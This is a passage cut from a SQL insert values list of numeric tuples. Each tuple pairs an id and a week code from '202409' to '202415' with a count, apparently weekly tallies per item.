3041,1,'202409',5),(3063,1,'202409',5),(3253,1,'202409',5),(3275,1,'202409',5),(3316,1,'202409',5),(3430,1,'202409',5),(3486,1,'202409',5),(3710,1,'202409',5),(3721,1,'202409',5),(3746,1,'202409',5),(4323,1,'202409',5),(4400,1,'202409',5),(4412,1,'202409',5),(4424,1,'202409',5),(4448,1,'202409',5),(4457,1,'202409',5),(4546,1,'202409',5),(4566,1,'202409',5),(4660,1,'202409',5),(4750,1,'202409',5),(4753,1,'202409',5),(4759,1,'202409',5),(4768,1,'202409',5),(4771,1,'202409',5),(4862,1,'202409',5),(4874,1,'202409',5),(5046,1,'202409',5),(5071,1,'202409',5),(5125,1,'202409',5),(5140,1,'202409',5),(5259,1,'202409',5),(5264,1,'202409',5),(5276,1,'202409',5),(5298,1,'202409',5),(5310,1,'202409',5),(5314,1,'202409',5),(5317,1,'202409',5),(5334,1,'202409',5),(5353,1,'202409',5),(74,1,'202409',6),(477,1,'202409',6),(479,1,'202409',6),(486,1,'202409',6),(1544,1,'202409',6),(1588,1,'202409',6),(1604,1,'202409',6),(1610,1,'202409',6),(1612,1,'202409',6),(1722,1,'202409',6),(1749,1,'202409',6),(1776,1,'202409',6),(2293,1,'202409',6),(2704,1,'202409',6),(2751,1,'202409',6),(2911,1,'202409',6),(2965,1,'202409',6),(3005,1,'202409',6),(3069,1,'202409',6),(3280,1,'202409',6),(3290,1,'202409',6),(3777,1,'202409',6),(4332,1,'202409',6),(4373,1,'202409',6),(4391,1,'202409',6),(4454,1,'202409',6),(4524,1,'202409',6),(4996,1,'202409',6),(5033,1,'202409',6),(5076,1,'202409',6),(5359,1,'202409',6),(84,1,'202409',7),(91,1,'202409',7),(473,1,'202409',7),(488,1,'202409',7),(1699,1,'202409',7),(1766,1,'202409',7),(1772,1,'202409',7),(2309,1,'202409',7),(2457,1,'202409',7),(2503,1,'202409',7),(2617,1,'202409',7),(2769,1,'202409',7),(2775,1,'202409',7),(2809,1,'202409',7),(3004,1,'202409',7),(3261,1,'202409',7),(4301,1,'202409',7),(4357,1,'202409',7),(4396,1,'202409',7),(4674,1,'202409',7),(4870,1,'202409',7),(5101,1,'202409',7),(5330,1,'202409',7),(5356,1,'202409',7),(478,1,'202409',8),(1614,1,'202409',8),(1768,1,'202409',8),(2964,1,'202409',8),(3030,1,'202409',8),(3083,1,'202409',8),(3297,1,'202409',8),(4663,1,'202409',8),(4709,1,'202409',8),(4866,1,'202409',8),(5131,1,'202409',8),(1582,1,'202409',9),(1592,1,'202409',9),(4377,1,'202409',9),(4551,1,'202409',9),(4648,1,'202409',9),(4677,1,'202409',9),(4700,1,'202409',9),(1594,1,'202409',10),(1734,1,'202409',10),(1743,1,'202409',10),(3006,1,'202409',10),(4645,1,'202409',10),(5163,1,'202409',10),(4930,1,'202409',11),(4977,1,'202409',11),(1602,1,'202409',12),(3066,1,'202409',13),(4520,1,'202409',14),(3764,1,'202409',15),(470,1,'202409',16),(2148,1,'202409',16),(89,1,'202409',18),(3781,1,'202409',18),(72,1,'202409',20),(1596,1,'202409',24),(3247,1,'202409',26),(68,1,'202409',31),(1586,1,'202409',35),(80,1,'202409',100),(9,1,'202409',11499),(102,1,'202410',1),(106,1,'202410',1),(108,1,'202410',1),(335,1,'202410',1),(476,1,'202410',1),(481,1,'202410',1),(484,1,'202410',1),(486,1,'202410',1),(488,1,'202410',1),(570,1,'202410',1),(1588,1,'202410',1),(1590,1,'202410',1),(1606,1,'202410',1),(1608,1,'202410',1),(1695,1,'202410',1),(1697,1,'202410',1),(1709,1,'202410',1),(1711,1,'202410',1),(1718,1,'202410',1),(1720,1,'202410',1),(1724,1,'202410',1),(1732,1,'202410',1),(1734,1,'202410',1),(1737,1,'202410',1),(1745,1,'202410',1),(1747,1,'202410',1),(1768,1,'202410',1),(1770,1,'202410',1),(1774,1,'202410',1),(1776,1,'202410',1),(1780,1,'202410',1),(1782,1,'202410',1),(2063,1,'202410',1),(2150,1,'202410',1),(2152,1,'202410',1),(2154,1,'202410',1),(2156,1,'202410',1),(2159,1,'202410',1),(2165,1,'202410',1),(2178,1,'202410',1),(2248,1,'202410',1),(2293,1,'202410',1),(2296,1,'202410',1),(2558,1,'202410',1),(2609,1,'202410',1),(2617,1,'202410',1),(2658,1,'202410',1),(2804,1,'202410',1),(2989,1,'202410',1),(2991,1,'202410',1),(2993,1,'202410',1),(3004,1,'202410',1),(3005,1,'202410',1),(3006,1,'202410',1),(3023,1,'202410',1),(3027,1,'202410',1),(3041,1,'202410',1),(3045,1,'202410',1),(3072,1,'202410',1),(3079,1,'202410',1),(3087,1,'202410',1),(3096,1,'202410',1),(3102,1,'202410',1),(3104,1,'202410',1),(3117,1,'202410',1),(3124,1,'202410',1),(3229,1,'202410',1),(3240,1,'202410',1),(3243,1,'202410',1),(3245,1,'202410',1),(3249,1,'202410',1),(3257,1,'202410',1),(3259,1,'202410',1),(3263,1,'202410',1),(3265,1,'202410',1),(3267,1,'202410',1),(3269,1,'202410',1),(3271,1,'202410',1),(3275,1,'202410',1),(3278,1,'202410',1),(3280,1,'202410',1),(3285,1,'202410',1),(3316,1,'202410',1),(3438,1,'202410',1),(3479,1,'202410',1),(3482,1,'202410',1),(3498,1,'202410',1),(3531,1,'202410',1),(3534,1,'202410',1),(3541,1,'202410',1),(3714,1,'202410',1),(3721,1,'202410',1),(3724,1,'202410',1),(3727,1,'202410',1),(3731,1,'202410',1),(3735,1,'202410',1),(3738,1,'202410',1),(3742,1,'202410',1),(3746,1,'202410',1),(3749,1,'202410',1),(3752,1,'202410',1),(3774,1,'202410',1),(3777,1,'202410',1),(4275,1,'202410',1),(4301,1,'202410',1),(4323,1,'202410',1),(4326,1,'202410',1),(4338,1,'202410',1),(4341,1,'202410',1),(4357,1,'202410',1),(4363,1,'202410',1),(4368,1,'202410',1),(4377,1,'202410',1),(4382,1,'202410',1),(4387,1,'202410',1),(4391,1,'202410',1),(4400,1,'202410',1),(4404,1,'202410',1),(4408,1,'202410',1),(4424,1,'202410',1),(4436,1,'202410',1),(4444,1,'202410',1),(4454,1,'202410',1),(4517,1,'202410',1),(4520,1,'202410',1),(4546,1,'202410',1),(4556,1,'202410',1),(4566,1,'202410',1),(4582,1,'202410',1),(4608,1,'202410',1),(4651,1,'202410',1),(4654,1,'202410',1),(4660,1,'202410',1),(4663,1,'202410',1),(4668,1,'202410',1),(4674,1,'202410',1),(4677,1,'202410',1),(4681,1,'202410',1),(4688,1,'202410',1),(4691,1,'202410',1),(4697,1,'202410',1),(4703,1,'202410',1),(4712,1,'202410',1),(4722,1,'202410',1),(4744,1,'202410',1),(4747,1,'202410',1),(4750,1,'202410',1),(4753,1,'202410',1),(4756,1,'202410',1),(4759,1,'202410',1),(4765,1,'202410',1),(4771,1,'202410',1),(4792,1,'202410',1),(4797,1,'202410',1),(4802,1,'202410',1),(4858,1,'202410',1),(4862,1,'202410',1),(4870,1,'202410',1),(4874,1,'202410',1),(4878,1,'202410',1),(4883,1,'202410',1),(4888,1,'202410',1),(4893,1,'202410',1),(4897,1,'202410',1),(4976,1,'202410',1),(4980,1,'202410',1),(4983,1,'202410',1),(4996,1,'202410',1),(5020,1,'202410',1),(5024,1,'202410',1),(5037,1,'202410',1),(5050,1,'202410',1),(5054,1,'202410',1),(5058,1,'202410',1),(5067,1,'202410',1),(5125,1,'202410',1),(5134,1,'202410',1),(5146,1,'202410',1),(5153,1,'202410',1),(5157,1,'202410',1),(5248,1,'202410',1),(5256,1,'202410',1),(5292,1,'202410',1),(5295,1,'202410',1),(5310,1,'202410',1),(5314,1,'202410',1),(5317,1,'202410',1),(5320,1,'202410',1),(5326,1,'202410',1),(5334,1,'202410',1),(5353,1,'202410',1),(5356,1,'202410',1),(5359,1,'202410',1),(5363,1,'202410',1),(5378,1,'202410',1),(5383,1,'202410',1),(74,1,'202410',2),(87,1,'202410',2),(110,1,'202410',2),(469,1,'202410',2),(473,1,'202410',2),(479,1,'202410',2),(480,1,'202410',2),(483,1,'202410',2),(485,1,'202410',2),(1544,1,'202410',2),(1598,1,'202410',2),(1705,1,'202410',2),(1707,1,'202410',2),(1730,1,'202410',2),(1741,1,'202410',2),(2252,1,'202410',2),(2813,1,'202410',2),(2904,1,'202410',2),(3034,1,'202410',2),(3063,1,'202410',2),(3090,1,'202410',2),(3092,1,'202410',2),(3251,1,'202410',2),(3253,1,'202410',2),(3282,1,'202410',2),(3287,1,'202410',2),(3307,1,'202410',2),(3313,1,'202410',2),(4238,1,'202410',2),(4329,1,'202410',2),(4420,1,'202410',2),(4432,1,'202410',2),(4440,1,'202410',2),(4448,1,'202410',2),(4514,1,'202410',2),(4524,1,'202410',2),(4529,1,'202410',2),(4587,1,'202410',2),(4591,1,'202410',2),(4612,1,'202410',2),(4645,1,'202410',2),(4657,1,'202410',2),(4741,1,'202410',2),(4768,1,'202410',2),(4988,1,'202410',2),(5046,1,'202410',2),(5062,1,'202410',2),(5071,1,'202410',2),(5080,1,'202410',2),(5101,1,'202410',2),(5128,1,'202410',2),(5131,1,'202410',2),(5140,1,'202410',2),(5253,1,'202410',2),(5259,1,'202410',2),(5264,1,'202410',2),(5271,1,'202410',2),(5276,1,'202410',2),(5298,1,'202410',2),(5323,1,'202410',2),(84,1,'202410',3),(467,1,'202410',3),(468,1,'202410',3),(471,1,'202410',3),(472,1,'202410',3),(474,1,'202410',3),(477,1,'202410',3),(478,1,'202410',3),(1701,1,'202410',3),(1703,1,'202410',3),(1739,1,'202410',3),(2161,1,'202410',3),(2503,1,'202410',3),(2748,1,'202410',3),(2809,1,'202410',3),(3083,1,'202410',3),(3109,1,'202410',3),(3290,1,'202410',3),(3297,1,'202410',3),(3710,1,'202410',3),(4428,1,'202410',3),(4648,1,'202410',3),(4685,1,'202410',3),(4776,1,'202410',3),(4866,1,'202410',3),(4977,1,'202410',3),(5042,1,'202410',3),(5137,1,'202410',3),(5280,1,'202410',3),(1612,1,'202410',4),(1726,1,'202410',4),(1728,1,'202410',4),(1751,1,'202410',4),(2297,1,'202410',4),(3066,1,'202410',4),(3069,1,'202410',4),(3107,1,'202410',4),(3226,1,'202410',4),(3486,1,'202410',4),(3764,1,'202410',4),(4332,1,'202410',4),(4373,1,'202410',4),(4457,1,'202410',4),(5028,1,'202410',4),(5076,1,'202410',4),(5268,1,'202410',4),(5374,1,'202410',4),(76,1,'202410',5),(91,1,'202410',5),(487,1,'202410',5),(2309,1,'202410',5),(2956,1,'202410',5),(3038,1,'202410',5),(3060,1,'202410',5),(4396,1,'202410',5),(4416,1,'202410',5),(4700,1,'202410',5),(5307,1,'202410',5),(1766,1,'202410',6),(3430,1,'202410',6),(1592,1,'202410',7),(1749,1,'202410',7),(3030,1,'202410',7),(3771,1,'202410',7),(5289,1,'202410',7),(3261,1,'202410',8),(3489,1,'202410',8),(1699,1,'202410',9),(4335,1,'202410',9),(4930,1,'202410',9),(72,1,'202410',10),(89,1,'202410',10),(2148,1,'202410',10),(2457,1,'202410',10),(4551,1,'202410',10),(5330,1,'202410',10),(1614,1,'202410',11),(1602,1,'202410',12),(1772,1,'202410',12),(1722,1,'202410',13),(3247,1,'202410',13),(4412,1,'202410',15),(1594,1,'202410',17),(470,1,'202410',18),(1582,1,'202410',18),(1586,1,'202410',18),(1596,1,'202410',18),(5163,1,'202410',21),(3781,1,'202410',22),(68,1,'202410',30),(80,1,'202410',82),(9,1,'202410',9990),(87,1,'202411',1),(108,1,'202411',1),(110,1,'202411',1),(335,1,'202411',1),(474,1,'202411',1),(478,1,'202411',1),(482,1,'202411',1),(483,1,'202411',1),(488,1,'202411',1),(1584,1,'202411',1),(1598,1,'202411',1),(1604,1,'202411',1),(1608,1,'202411',1),(1705,1,'202411',1),(1713,1,'202411',1),(1726,1,'202411',1),(1728,1,'202411',1),(1732,1,'202411',1),(1737,1,'202411',1),(1741,1,'202411',1),(1743,1,'202411',1),(1778,1,'202411',1),(2156,1,'202411',1),(2178,1,'202411',1),(2503,1,'202411',1),(2617,1,'202411',1),(2804,1,'202411',1),(2989,1,'202411',1),(2993,1,'202411',1),(3038,1,'202411',1),(3069,1,'202411',1),(3083,1,'202411',1),(3096,1,'202411',1),(3097,1,'202411',1),(3124,1,'202411',1),(3127,1,'202411',1),(3240,1,'202411',1),(3243,1,'202411',1),(3245,1,'202411',1),(3249,1,'202411',1),(3259,1,'202411',1),(3269,1,'202411',1),(3273,1,'202411',1),(3285,1,'202411',1),(3534,1,'202411',1),(3731,1,'202411',1),(3749,1,'202411',1),(3752,1,'202411',1),(3777,1,'202411',1),(4332,1,'202411',1),(4341,1,'202411',1),(4368,1,'202411',1),(4404,1,'202411',1),(4408,1,'202411',1),(4416,1,'202411',1),(4424,1,'202411',1),(4440,1,'202411',1),(4529,1,'202411',1),(4546,1,'202411',1),(4556,1,'202411',1),(4648,1,'202411',1),(4663,1,'202411',1),(4677,1,'202411',1),(4688,1,'202411',1),(4694,1,'202411',1),(4697,1,'202411',1),(4703,1,'202411',1),(4706,1,'202411',1),(4709,1,'202411',1),(4759,1,'202411',1),(4792,1,'202411',1),(4888,1,'202411',1),(4897,1,'202411',1),(4976,1,'202411',1),(4988,1,'202411',1),(4996,1,'202411',1),(5020,1,'202411',1),(5028,1,'202411',1),(5054,1,'202411',1),(5071,1,'202411',1),(5080,1,'202411',1),(5101,1,'202411',1),(5122,1,'202411',1),(5134,1,'202411',1),(5137,1,'202411',1),(5153,1,'202411',1),(5248,1,'202411',1),(5253,1,'202411',1),(5256,1,'202411',1),(5276,1,'202411',1),(5298,1,'202411',1),(5304,1,'202411',1),(5320,1,'202411',1),(5323,1,'202411',1),(5359,1,'202411',1),(5363,1,'202411',1),(5374,1,'202411',1),(5383,1,'202411',1),(468,1,'202411',2),(472,1,'202411',2),(473,1,'202411',2),(570,1,'202411',2),(1600,1,'202411',2),(1606,1,'202411',2),(1610,1,'202411',2),(1711,1,'202411',2),(1715,1,'202411',2),(1776,1,'202411',2),(1780,1,'202411',2),(2309,1,'202411',2),(2748,1,'202411',2),(2751,1,'202411',2),(2801,1,'202411',2),(2904,1,'202411',2),(2991,1,'202411',2),(3005,1,'202411',2),(3063,1,'202411',2),(3087,1,'202411',2),(3229,1,'202411',2),(3265,1,'202411',2),(3290,1,'202411',2),(3316,1,'202411',2),(3479,1,'202411',2),(3489,1,'202411',2),(4335,1,'202411',2),(4428,1,'202411',2),(4444,1,'202411',2),(4454,1,'202411',2),(4542,1,'202411',2),(4608,1,'202411',2),(4674,1,'202411',2),(4762,1,'202411',2),(4983,1,'202411',2),(5050,1,'202411',2),(5131,1,'202411',2),(5146,1,'202411',2),(5268,1,'202411',2),(5301,1,'202411',2),(5307,1,'202411',2),(72,1,'202411',3),(91,1,'202411',3),(487,1,'202411',3),(2161,1,'202411',3),(3107,1,'202411',3),(3541,1,'202411',3),(480,1,'202411',4),(1749,1,'202411',4),(3030,1,'202411',4),(3275,1,'202411',4),(3764,1,'202411',4),(4238,1,'202411',4),(4357,1,'202411',4),(4436,1,'202411',4),(4520,1,'202411',4),(4866,1,'202411',4),(4930,1,'202411',4),(5330,1,'202411',4),(2457,1,'202411',5),(2558,1,'202411',5),(5046,1,'202411',5),(5163,1,'202411',5),(5314,1,'202411',5),(1592,1,'202411',6),(1602,1,'202411',6),(1772,1,'202411',6),(2809,1,'202411',6),(3060,1,'202411',6),(3297,1,'202411',6),(3430,1,'202411',6),(4396,1,'202411',6),(4771,1,'202411',6),(5125,1,'202411',6),(89,1,'202411',7),(471,1,'202411',7),(477,1,'202411',7),(2964,1,'202411',7),(3102,1,'202411',7),(4412,1,'202411',7),(5076,1,'202411',7),(1594,1,'202411',8),(1722,1,'202411',8),(3066,1,'202411',8),(4551,1,'202411',8),(4685,1,'202411',8),(1614,1,'202411',9),(470,1,'202411',10),(1699,1,'202411',10),(1582,1,'202411',11),(1612,1,'202411',12),(2148,1,'202411',12),(3004,1,'202411',12),(3781,1,'202411',12),(4645,1,'202411',12),(1596,1,'202411',15),(68,1,'202411',16),(1586,1,'202411',16),(3247,1,'202411',17),(80,1,'202411',81),(9,1,'202411',6569),(72,1,'202412',1),(87,1,'202412',1),(102,1,'202412',1),(106,1,'202412',1),(108,1,'202412',1),(468,1,'202412',1),(469,1,'202412',1),(480,1,'202412',1),(481,1,'202412',1),(484,1,'202412',1),(488,1,'202412',1),(1582,1,'202412',1),(1584,1,'202412',1),(1602,1,'202412',1),(1713,1,'202412',1),(1722,1,'202412',1),(1747,1,'202412',1),(1766,1,'202412',1),(1776,1,'202412',1),(1778,1,'202412',1),(2178,1,'202412',1),(2293,1,'202412',1),(2617,1,'202412',1),(2704,1,'202412',1),(2809,1,'202412',1),(3005,1,'202412',1),(3006,1,'202412',1),(3030,1,'202412',1),(3063,1,'202412',1),(3079,1,'202412',1),(3117,1,'202412',1),(3273,1,'202412',1),(3287,1,'202412',1),(3297,1,'202412',1),(3486,1,'202412',1),(3531,1,'202412',1),(3541,1,'202412',1),(3714,1,'202412',1),(3724,1,'202412',1),(3738,1,'202412',1),(4238,1,'202412',1),(4329,1,'202412',1),(4338,1,'202412',1),(4382,1,'202412',1),(4424,1,'202412',1),(4440,1,'202412',1),(4457,1,'202412',1),(4520,1,'202412',1),(4546,1,'202412',1),(4657,1,'202412',1),(4668,1,'202412',1),(4691,1,'202412',1),(4697,1,'202412',1),(4703,1,'202412',1),(4744,1,'202412',1),(4753,1,'202412',1),(4756,1,'202412',1),(4759,1,'202412',1),(4762,1,'202412',1),(4765,1,'202412',1),(4976,1,'202412',1),(5024,1,'202412',1),(5028,1,'202412',1),(5080,1,'202412',1),(5101,1,'202412',1),(5140,1,'202412',1),(5146,1,'202412',1),(5157,1,'202412',1),(5264,1,'202412',1),(5280,1,'202412',1),(5295,1,'202412',1),(5301,1,'202412',1),(5320,1,'202412',1),(5334,1,'202412',1),(5353,1,'202412',1),(5383,1,'202412',1),(74,1,'202412',2),(76,1,'202412',2),(84,1,'202412',2),(89,1,'202412',2),(91,1,'202412',2),(470,1,'202412',2),(474,1,'202412',2),(477,1,'202412',2),(1544,1,'202412',2),(1586,1,'202412',2),(1590,1,'202412',2),(1592,1,'202412',2),(1600,1,'202412',2),(1612,1,'202412',2),(1699,1,'202412',2),(1720,1,'202412',2),(1743,1,'202412',2),(1749,1,'202412',2),(2165,1,'202412',2),(2457,1,'202412',2),(2558,1,'202412',2),(2904,1,'202412',2),(2964,1,'202412',2),(3004,1,'202412',2),(3023,1,'202412',2),(3045,1,'202412',2),(3069,1,'202412',2),(3087,1,'202412',2),(3090,1,'202412',2),(3102,1,'202412',2),(3104,1,'202412',2),(3124,1,'202412',2),(3261,1,'202412',2),(3278,1,'202412',2),(3280,1,'202412',2),(3285,1,'202412',2),(3731,1,'202412',2),(4332,1,'202412',2),(4335,1,'202412',2),(4448,1,'202412',2),(4930,1,'202412',2),(4983,1,'202412',2),(4996,1,'202412',2),(5046,1,'202412',2),(5163,1,'202412',2),(5298,1,'202412',2),(467,1,'202412',3),(570,1,'202412',3),(1705,1,'202412',3),(2159,1,'202412',3),(2609,1,'202412',3),(3060,1,'202412',3),(3249,1,'202412',3),(3764,1,'202412',3),(4357,1,'202412',3),(5314,1,'202412',3),(1594,1,'202412',4),(2161,1,'202412',4),(2813,1,'202412',4),(3066,1,'202412',4),(3083,1,'202412',4),(3489,1,'202412',4),(4517,1,'202412',4),(4551,1,'202412',4),(4645,1,'202412',4),(4654,1,'202412',4),(4674,1,'202412',4),(4700,1,'202412',4),(5374,1,'202412',4),(4663,1,'202412',5),(4685,1,'202412',5),(5131,1,'202412',5),(487,1,'202412',6),(3251,1,'202412',6),(5076,1,'202412',6),(4412,1,'202412',7),(1614,1,'202412',8),(1596,1,'202412',9),(2148,1,'202412',11),(3781,1,'202412',11),(68,1,'202412',16),(3247,1,'202412',23),(80,1,'202412',64),(9,1,'202412',6959),(84,1,'202413',1),(335,1,'202413',1),(470,1,'202413',1),(473,1,'202413',1),(474,1,'202413',1),(481,1,'202413',1),(487,1,'202413',1),(570,1,'202413',1),(1592,1,'202413',1),(1695,1,'202413',1),(1701,1,'202413',1),(1703,1,'202413',1),(1711,1,'202413',1),(1720,1,'202413',1),(1728,1,'202413',1),(1743,1,'202413',1),(1776,1,'202413',1),(2248,1,'202413',1),(2309,1,'202413',1),(2748,1,'202413',1),(2751,1,'202413',1),(2769,1,'202413',1),(2801,1,'202413',1),(2991,1,'202413',1),(3004,1,'202413',1),(3107,1,'202413',1),(3229,1,'202413',1),(3297,1,'202413',1),(3307,1,'202413',1),(3489,1,'202413',1),(3541,1,'202413',1),(3735,1,'202413',1),(3738,1,'202413',1),(4301,1,'202413',1),(4408,1,'202413',1),(4428,1,'202413',1),(4444,1,'202413',1),(4448,1,'202413',1),(4454,1,'202413',1),(4524,1,'202413',1),(4566,1,'202413',1),(4660,1,'202413',1),(4668,1,'202413',1),(4681,1,'202413',1),(4691,1,'202413',1),(4697,1,'202413',1),(4706,1,'202413',1),(4712,1,'202413',1),(4722,1,'202413',1),(4741,1,'202413',1),(4753,1,'202413',1),(4756,1,'202413',1),(4765,1,'202413',1),(4866,1,'202413',1),(4878,1,'202413',1),(4980,1,'202413',1),(4988,1,'202413',1),(5062,1,'202413',1),(5071,1,'202413',1),(5101,1,'202413',1),(5122,1,'202413',1),(5131,1,'202413',1),(5137,1,'202413',1),(5264,1,'202413',1),(5289,1,'202413',1),(5304,1,'202413',1),(5307,1,'202413',1),(5310,1,'202413',1),(5314,1,'202413',1),(5317,1,'202413',1),(5353,1,'202413',1),(5359,1,'202413',1),(87,1,'202413',2),(91,1,'202413',2),(110,1,'202413',2),(467,1,'202413',2),(480,1,'202413',2),(1590,1,'202413',2),(1598,1,'202413',2),(1600,1,'202413',2),(1697,1,'202413',2),(1699,1,'202413',2),(1782,1,'202413',2),(2161,1,'202413',2),(2965,1,'202413',2),(3023,1,'202413',2),(3060,1,'202413',2),(3066,1,'202413',2),(3083,1,'202413',2),(3102,1,'202413',2),(3253,1,'202413',2),(3282,1,'202413',2),(3430,1,'202413',2),(3731,1,'202413',2),(4238,1,'202413',2),(4275,1,'202413',2),(4338,1,'202413',2),(4357,1,'202413',2),(4396,1,'202413',2),(4404,1,'202413',2),(4416,1,'202413',2),(4420,1,'202413',2),(4432,1,'202413',2),(4436,1,'202413',2),(4457,1,'202413',2),(4517,1,'202413',2),(4582,1,'202413',2),(4663,1,'202413',2),(4674,1,'202413',2),(4677,1,'202413',2),(4700,1,'202413',2),(4709,1,'202413',2),(4750,1,'202413',2),(4976,1,'202413',2),(4983,1,'202413',2),(4996,1,'202413',2),(5020,1,'202413',2),(5028,1,'202413',2),(5042,1,'202413',2),(5146,1,'202413',2),(5280,1,'202413',2),(5334,1,'202413',2),(468,1,'202413',3),(477,1,'202413',3),(1544,1,'202413',3),(1582,1,'202413',3),(1594,1,'202413',3),(1770,1,'202413',3),(3005,1,'202413',3),(3006,1,'202413',3),(3285,1,'202413',3),(4520,1,'202413',3),(4651,1,'202413',3),(4654,1,'202413',3),(4776,1,'202413',3),(5080,1,'202413',3),(72,1,'202413',4),(74,1,'202413',4),(89,1,'202413',4),(1602,1,'202413',4),(1608,1,'202413',4),(1612,1,'202413',4),(1749,1,'202413',4),(1780,1,'202413',4),(2296,1,'202413',4),(2297,1,'202413',4),(2609,1,'202413',4),(2904,1,'202413',4),(2964,1,'202413',4),(3249,1,'202413',4),(3265,1,'202413',4),(3764,1,'202413',4),(5374,1,'202413',4),(471,1,'202413',5),(2165,1,'202413',5),(3261,1,'202413',5),(4551,1,'202413',5),(1724,1,'202413',6),(4363,1,'202413',6),(5076,1,'202413',6),(5163,1,'202413',6),(76,1,'202413',7),(68,1,'202413',8),(3069,1,'202413',8),(4412,1,'202413',8),(1614,1,'202413',9),(1596,1,'202413',10),(5050,1,'202413',10),(2148,1,'202413',11),(3781,1,'202413',12),(3247,1,'202413',13),(4759,1,'202413',15),(1586,1,'202413',29),(80,1,'202413',60),(9,1,'202413',8795),(102,1,'202414',1),(106,1,'202414',1),(108,1,'202414',1),(110,1,'202414',1),(1582,1,'202414',1),(1596,1,'202414',1),(1604,1,'202414',1),(1606,1,'202414',1),(1699,1,'202414',1),(1703,1,'202414',1),(1713,1,'202414',1),(1718,1,'202414',1),(1724,1,'202414',1),(1728,1,'202414',1),(1730,1,'202414',1),(1734,1,'202414',1),(1743,1,'202414',1),(1768,1,'202414',1),(1776,1,'202414',1),(1778,1,'202414',1),(2150,1,'202414',1),(2178,1,'202414',1),(2609,1,'202414',1),(2617,1,'202414',1),(2658,1,'202414',1),(2704,1,'202414',1),(2751,1,'202414',1),(2769,1,'202414',1),(2801,1,'202414',1),(2989,1,'202414',1),(3006,1,'202414',1),(3027,1,'202414',1),(3034,1,'202414',1),(3038,1,'202414',1),(3060,1,'202414',1),(3063,1,'202414',1),(3072,1,'202414',1),(3107,1,'202414',1),(3109,1,'202414',1),(3243,1,'202414',1),(3251,1,'202414',1),(3253,1,'202414',1),(3257,1,'202414',1),(3261,1,'202414',1),(3267,1,'202414',1),(3271,1,'202414',1),(3316,1,'202414',1),(3541,1,'202414',1),(3714,1,'202414',1),(3727,1,'202414',1),(3742,1,'202414',1),(3746,1,'202414',1),(3752,1,'202414',1),(3764,1,'202414',1),(3771,1,'202414',1),(3774,1,'202414',1),(3777,1,'202414',1),(4329,1,'202414',1),(4341,1,'202414',1),(4368,1,'202414',1),(4391,1,'202414',1),(4416,1,'202414',1),(4444,1,'202414',1),(4448,1,'202414',1),(4514,1,'202414',1),(4524,1,'202414',1),(4542,1,'202414',1),(4556,1,'202414',1),(4566,1,'202414',1),(4645,1,'202414',1),(4674,1,'202414',1),(4697,1,'202414',1),(4709,1,'202414',1),(4741,1,'202414',1),(4747,1,'202414',1),(4930,1,'202414',1),(5020,1,'202414',1),(5062,1,'202414',1),(5131,1,'202414',1),(5137,1,'202414',1),(5153,1,'202414',1),(5163,1,'202414',1),(5271,1,'202414',1),(5280,1,'202414',1),(5289,1,'202414',1),(5323,1,'202414',1),(5334,1,'202414',1),(5356,1,'202414',1),(5378,1,'202414',1),(68,1,'202414',2),(335,1,'202414',2),(467,1,'202414',2),(480,1,'202414',2),(570,1,'202414',2),(2309,1,'202414',2),(2503,1,'202414',2),(2813,1,'202414',2),(3023,1,'202414',2),(3030,1,'202414',2),(3066,1,'202414',2),(3249,1,'202414',2),(3259,1,'202414',2),(4238,1,'202414',2),(4408,1,'202414',2),(4428,1,'202414',2),(4432,1,'202414',2),(4753,1,'202414',2),(4768,1,'202414',2),(4866,1,'202414',2),(4874,1,'202414',2),(4983,1,'202414',2),(4996,1,'202414',2),(5028,1,'202414',2),(5157,1,'202414',2),(74,1,'202414',3),(76,1,'202414',3),(91,1,'202414',3),(1608,1,'202414',3),(1697,1,'202414',3),(1715,1,'202414',3),(1766,1,'202414',3),(1780,1,'202414',3),(2156,1,'202414',3),(2558,1,'202414',3),(2904,1,'202414',3),(3079,1,'202414',3),(3083,1,'202414',3),(3226,1,'202414',3),(3285,1,'202414',3),(3307,1,'202414',3),(4412,1,'202414',3),(4551,1,'202414',3),(4677,1,'202414',3),(4792,1,'202414',3),(4802,1,'202414',3),(4858,1,'202414',3),(4878,1,'202414',3),(4888,1,'202414',3),(5080,1,'202414',3),(5140,1,'202414',3),(5248,1,'202414',3),(5264,1,'202414',3),(470,1,'202414',4),(472,1,'202414',4),(477,1,'202414',4),(479,1,'202414',4),(482,1,'202414',4),(483,1,'202414',4),(484,1,'202414',4),(486,1,'202414',4),(487,1,'202414',4),(1590,1,'202414',4),(2457,1,'202414',4),(2775,1,'202414',4),(3041,1,'202414',4),(3265,1,'202414',4),(4301,1,'202414',4),(4797,1,'202414',4),(476,1,'202414',5),(478,1,'202414',5),(481,1,'202414',5),(485,1,'202414',5),(488,1,'202414',5),(1588,1,'202414',5),(1598,1,'202414',5),(1610,1,'202414',5),(1614,1,'202414',5),(2297,1,'202414',5),(2748,1,'202414',5),(2809,1,'202414',5),(2965,1,'202414',5),(3004,1,'202414',5),(3245,1,'202414',5),(5033,1,'202414',5),(5076,1,'202414',5),(5330,1,'202414',5),(468,1,'202414',6),(469,1,'202414',6),(474,1,'202414',6),(1592,1,'202414',6),(1600,1,'202414',6),(1602,1,'202414',6),(1749,1,'202414',6),(2154,1,'202414',6),(2159,1,'202414',6),(3102,1,'202414',6),(4363,1,'202414',6),(4457,1,'202414',6),(4520,1,'202414',6),(4651,1,'202414',6),(87,1,'202414',7),(473,1,'202414',7),(1612,1,'202414',7),(1770,1,'202414',7),(3005,1,'202414',7),(3069,1,'202414',7),(4776,1,'202414',7),(5050,1,'202414',7),(471,1,'202414',8),(1594,1,'202414',8),(4517,1,'202414',8),(72,1,'202414',9),(1586,1,'202414',9),(2165,1,'202414',9),(2964,1,'202414',9),(89,1,'202414',10),(3781,1,'202414',10),(1544,1,'202414',11),(2148,1,'202414',11),(3247,1,'202414',26),(80,1,'202414',57),(9,1,'202414',7272),(72,1,'202415',1),(76,1,'202415',1),(84,1,'202415',1),(89,1,'202415',1),(102,1,'202415',1),(110,1,'202415',1),(335,1,'202415',1),(467,1,'202415',1),(469,1,'202415',1),(472,1,'202415',1),(477,1,'202415',1),(478,1,'202415',1),(479,1,'202415',1),(486,1,'202415',1),(488,1,'202415',1),(1588,1,'202415',1),(1590,1,'202415',1),(1592,1,'202415',1),(1602,1,'202415',1),(1703,1,'202415',1),(1720,1,'202415',1),(1734,1,'202415',1),(1747,1,'202415',1),(2063,1,'202415',1),(2161,1,'202415',1),(2178,1,'202415',1),(2558,1,'202415',1),(2617,1,'202415',1),(2751,1,'202415',1),(2769,1,'202415',1),(2775,1,'202415',1),(2801,1,'202415',1),(2804,1,'202415',1),(2813,1,'202415',1),(2965,1,'202415',1),(